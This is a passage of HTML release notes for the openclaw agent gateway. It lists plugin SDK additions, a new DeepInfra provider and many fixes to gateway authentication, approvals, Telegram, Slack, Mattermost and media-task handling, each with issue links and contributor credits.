<li>Plugin SDK/testing: add focused plugin runtime and environment fixture subpaths so plugin tests can avoid the broad <code>plugin-sdk/testing</code> barrel for common setup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: add a focused <code>plugin-sdk/plugin-test-api</code> helper subpath and move bundled plugin registration tests off the repo-only plugin API bridge. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: add generic host hooks for session state, next-turn context, trusted tool policy, UI descriptors, events, scheduler cleanup, and run-scoped plugin context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331488241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72287" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72287/hovercard" href="https://github.com/openclaw/openclaw/pull/72287">#72287</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Plugin SDK/testing: expose provider catalog, wizard, registry, manifest, public-artifact, outbound, and TTS contract helpers through documented SDK testing seams so bundled plugin tests no longer import repo <code>src/**</code> internals. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/DeepInfra: add a bundled DeepInfra provider with <code>DEEPINFRA_API_KEY</code> onboarding, dynamic OpenAI-compatible model discovery, image generation/editing, image/audio media understanding, TTS, text-to-video, memory embeddings, static catalog metadata, and provider-owned base URL policy. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4129162171" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53805" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/53805/hovercard" href="https://github.com/openclaw/openclaw/pull/53805">#53805</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081292816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48088" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48088/hovercard" href="https://github.com/openclaw/openclaw/pull/48088">#48088</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033250790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37576" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/37576/hovercard" href="https://github.com/openclaw/openclaw/pull/37576">#37576</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063305884" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43896/hovercard" href="https://github.com/openclaw/openclaw/issues/43896">#43896</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911558639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11533/hovercard" href="https://github.com/openclaw/openclaw/issues/11533">#11533</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3858643301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/2554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/2554/hovercard" href="https://github.com/openclaw/openclaw/issues/2554">#2554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ats3v/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ats3v">@ats3v</a>.</li>
<li>Matrix: attach versioned structured approval metadata to pending approval messages so capable Matrix clients can render richer approval UI while body text and reaction fallback keep working. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332314876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72432" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72432/hovercard" href="https://github.com/openclaw/openclaw/pull/72432">#72432</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kakahu2015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kakahu2015">@kakahu2015</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Gateway/sessions: align <code>chat.history</code> and <code>sessions.list</code> thinking defaults with owning-agent and catalog-aware resolution so Control UI session defaults match backend runtime state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228334073" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63418" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63418/hovercard" href="https://github.com/openclaw/openclaw/pull/63418">#63418</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpreagan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpreagan">@jpreagan</a>.</li>
<li>Devices/pairing: recover array-shaped device and node pairing state files before persisting approvals, so UUID-keyed pending and paired entries no longer disappear after a malformed JSON store write. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223190605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63035/hovercard" href="https://github.com/openclaw/openclaw/issues/63035">#63035</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sar618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sar618">@sar618</a>.</li>
<li>Gateway/auth: clear reused stale device tokens and stop reconnecting on device-token mismatch in the Control UI and Node gateway clients, avoiding rate-limit loops after scope-upgrade or token-rotation handoffs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328280664" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71609/hovercard" href="https://github.com/openclaw/openclaw/issues/71609">#71609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ricksayhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ricksayhi">@ricksayhi</a>.</li>
<li>Gateway/approvals: treat duplicate same-decision approval resolves as idempotent during the resolved-entry grace window, including consumed <code>allow-once</code> approvals, while returning an explicit already-resolved error for conflicting repeats. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188520175" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59162/hovercard" href="https://github.com/openclaw/openclaw/issues/59162">#59162</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4180849243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58479" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58479/hovercard" href="https://github.com/openclaw/openclaw/issues/58479">#58479</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249117948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65486/hovercard" href="https://github.com/openclaw/openclaw/issues/65486">#65486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wikithoughts/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wikithoughts">@wikithoughts</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sajazuniga7-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sajazuniga7-coder">@sajazuniga7-coder</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjmai20682068-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjmai20682068-create">@mjmai20682068-create</a>.</li>
<li>Channels/Telegram: honor <code>approvals.exec/plugin.targets[].accountId</code> when routing native approvals across multi-bot Telegram accounts while preserving unscoped Telegram targets for any account. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306154607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69916/hovercard" href="https://github.com/openclaw/openclaw/issues/69916">#69916</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Telegram/gateway: bound outbound Bot API calls and cache bundled plugin alias lookup so slow Telegram sends or WSL2 filesystem scans no longer wedge gateway replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348974196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74210/hovercard" href="https://github.com/openclaw/openclaw/pull/74210">#74210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Agents/exec: omit the internal session-resume fallback preface from successful async exec completion messages sent directly back to chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269075777" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67181" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67181/hovercard" href="https://github.com/openclaw/openclaw/issues/67181">#67181</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raistlin88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raistlin88">@raistlin88</a>.</li>
<li>Agents/media: register detached <code>video_generate</code> and <code>music_generate</code> tool run contexts until terminal status, so Discord-backed provider jobs stay live in <code>/tasks</code> instead of becoming <code>lost</code> when the parent chat run context disappears. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/media: prefer OpenAI image and video providers when the default model uses the OpenAI Codex auth alias, so auto media generation no longer falls through to Fal before GPT Image or Sora. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Tasks/media: infer agent ownership for session-scoped task records so <code>/tasks</code> agent-local fallback includes session-backed <code>video_generate</code> and other async media jobs even when the current chat session has no linked rows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/media: keep long-running <code>video_generate</code> and <code>music_generate</code> tasks fresh while provider jobs are still pending, so task maintenance does not mark active Discord media renders lost before completion. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/status: treat scope-limited gateway probes as reachable-but-degraded in shared status scans, so <code>openclaw status --all</code> no longer reports a live gateway as unreachable after <code>missing scope: operator.read</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090293663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49180" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49180/hovercard" href="https://github.com/openclaw/openclaw/issues/49180">#49180</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080656366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47981" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47981/hovercard" href="https://github.com/openclaw/openclaw/pull/47981">#47981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openjay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openjay">@openjay</a>.</li>
<li>CLI/update: skip tracked plugins disabled in config during post-update plugin sync before npm, ClawHub, or marketplace update checks, preserving their install records without failing the update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347036954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73880/hovercard" href="https://github.com/openclaw/openclaw/issues/73880">#73880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Slack/Socket Mode: use a 15s Slack SDK pong timeout by default and add <code>channels.slack.socketMode.clientPingTimeout</code>, <code>serverPingTimeout</code>, and <code>pingPongLoggingEnabled</code> overrides so stale-websocket handling no longer depends on app-event health heuristics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3928501869" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/14248" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/14248/hovercard" href="https://github.com/openclaw/openclaw/issues/14248">#14248</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181320028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58519/hovercard" href="https://github.com/openclaw/openclaw/issues/58519">#58519</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235931183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64009/hovercard" href="https://github.com/openclaw/openclaw/issues/64009">#64009</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228899443" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63488" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63488/hovercard" href="https://github.com/openclaw/openclaw/issues/63488">#63488</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivasymbl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivasymbl">@shivasymbl</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/freerk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/freerk">@freerk</a>.</li>
<li>Slack/media: bound private file and forwarded attachment downloads with idle and total timeouts while preserving placeholder fallback, so stalled Slack <code>file_share</code> media no longer wedges inbound message handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211497843" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61850/hovercard" href="https://github.com/openclaw/openclaw/issues/61850">#61850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bassboy2k/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bassboy2k">@bassboy2k</a>.</li>
<li>Plugins/inspector: keep bundled plugin runtime capture quiet and config-tolerant for Codex, memory-lancedb, Feishu, Mattermost, QQBot, and Tlon so plugin-inspector JSON checks can validate the full bundled set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/auto-reply: keep fully consumed text reset triggers such as <code>new session</code> out of <code>BodyForAgent</code> after directive cleanup, so configured Slack reset phrases do not leak into the fresh model turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339884694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73137/hovercard" href="https://github.com/openclaw/openclaw/issues/73137">#73137</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Plugins/runtime deps: prune stale retained bundled runtime deps and keep doctor/secret channel contract scans on lightweight artifacts, so disabled bundled channels stop preserving old dependency trees or importing heavy plugin surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime deps: cache unchanged bundled runtime mirror dist-file materialization decisions and close file-lock handles on owner-write failures, reducing repeated startup chunk scans and avoiding FileHandle-GC recovery stalls. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Auto-reply: bound the post-run pending tool-result delivery drain with a progress-aware idle timeout, so a never-settling tool-result task no longer leaves the session active forever while slow healthy deliveries can keep draining. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130025048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53889" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53889/hovercard" href="https://github.com/openclaw/openclaw/issues/53889">#53889</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243998262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64733" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64733/hovercard" href="https://github.com/openclaw/openclaw/pull/64733">#64733</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341833964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73434/hovercard" href="https://github.com/openclaw/openclaw/pull/73434">#73434</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zijunl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zijunl">@zijunl</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>Gateway/startup: start chat channels without waiting for primary model prewarm, keeping model warmup bounded in the background so Slack and other channels come online promptly when provider discovery is slow. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341654117" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73420" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73420/hovercard" href="https://github.com/openclaw/openclaw/pull/73420">#73420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dorukardahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dorukardahan">@dorukardahan</a>.</li>
<li>Gateway/install: carry env-backed config SecretRefs such as <code>channels.discord.token</code> into generated service environments when they are present only in the installing shell, while keeping gateway auth SecretRefs non-persisted. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278464013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67817/hovercard" href="https://github.com/openclaw/openclaw/issues/67817">#67817</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341722381" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73426/hovercard" href="https://github.com/openclaw/openclaw/pull/73426">#73426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdimaculangan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdimaculangan">@wdimaculangan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ztexydt-cqh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ztexydt-cqh">@ztexydt-cqh</a>.</li>
<li>Auto-reply/commands: stop bare <code>/reset</code> and <code>/new</code> after reset hooks acknowledge the command, so non-ACP channels no longer fall through into empty provider calls while <code>/reset &lt;message&gt;</code> and <code>/new &lt;message&gt;</code> still seed the next model turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341297328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73367" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73367/hovercard" href="https://github.com/openclaw/openclaw/issues/73367">#73367</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341562364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73412" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73412/hovercard" href="https://github.com/openclaw/openclaw/issues/73412">#73412</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hoyanhan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hoyanhan">@hoyanhan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wenxu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wenxu007">@wenxu007</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amdhelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amdhelper">@amdhelper</a>.</li>
<li>Providers/DeepSeek: backfill DeepSeek V4 <code>reasoning_content</code> on plain assistant replay messages as well as tool-call turns, so thinking sessions with prior tool use no longer fail follow-up requests with missing reasoning content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341637215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73417/hovercard" href="https://github.com/openclaw/openclaw/issues/73417">#73417</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326839791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71372" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71372/hovercard" href="https://github.com/openclaw/openclaw/issues/71372">#71372</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/34262315716/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/34262315716">@34262315716</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>.</li>
<li>Agents/gateway tool: strip full config payloads from <code>config.patch</code> and <code>config.apply</code> tool responses while preserving direct RPC responses, so config-heavy sessions no longer replay large redacted configs into transcript history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079102358" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47610/hovercard" href="https://github.com/openclaw/openclaw/issues/47610">#47610</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341899536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73439" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73439/hovercard" href="https://github.com/openclaw/openclaw/pull/73439">#73439</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HanenVit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HanenVit">@HanenVit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Auto-reply: preserve voice-note media from silent turns while continuing to suppress text and non-voice media, so <code>NO_REPLY</code> TTS replies still deliver the requested audio bubble. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341519878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73406/hovercard" href="https://github.com/openclaw/openclaw/pull/73406">#73406</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Channels/Mattermost: stop enqueueing regular inbound posts as system events, so Mattermost user messages reach the model only as user-role inbound-envelope content instead of also appearing as <code>System: Mattermost message...</code> directives. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329384231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71795" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71795/hovercard" href="https://github.com/openclaw/openclaw/issues/71795">#71795</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Agents/media: qualify bare <code>agents.defaults.imageModel</code> and <code>pdfModel</code> refs from unique configured image-capable providers, so Ollama vision models such as <code>moondream</code> and <code>qwen2.5vl:7b</code> do not fall through to the default provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038277975" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38816" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38816/hovercard" href="https://github.com/openclaw/openclaw/issues/38816">#38816</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341470414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73396" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73396/hovercard" href="https://github.com/openclaw/openclaw/pull/73396">#73396</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alainasclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alainasclaw">@alainasclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Anthropic: send implicit Anthropic beta headers only to direct public Anthropic endpoints, including OAuth, so custom Anthropic-compatible providers no longer mis-handle unsupported beta flags unless explicitly configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341127562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73346" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73346/hovercard" href="https://github.com/openclaw/openclaw/pull/73346">#73346</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/byBrodowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/byBrodowski">@byBrodowski</a>.</li>
